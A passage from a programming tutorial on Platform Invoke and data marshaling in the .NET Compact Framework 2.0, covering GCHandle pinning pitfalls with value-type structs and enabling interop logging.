IntPtr ptrToClass = classHandle.AddrOfPinnedObject();
int result = PassPtrToUnmanagedCode(ptrToClass); // our function
You can also make an instance of GCHandle as a member of the class to avoid deleting them by GC. Also you should remember that the structure is value-type. And pinning it to the memory will cause a problem, because structure will be copied and GCHandle will handle a reference to created “boxed” copy of the object. It will be hard to find such problem in the future.
Conclusion
During marshaling data you may face with the problems described above. Very often you may get “NotSupportedException” and other exceptions. To find a problem you can enable logging of setting the registry keys. One of the logging components is “Interop ”. The log provides information about Platform Invoke calls and marshaling. You can read MSDN for more information about Creating Log Files.
With the .NET Compact Framework 2.0 you can use Platform Invoke calls in managed application, even though there are a few limitations. You should remember all differences and limitations between full .NET Framework and the Compact Framework to avoid problems in your applications.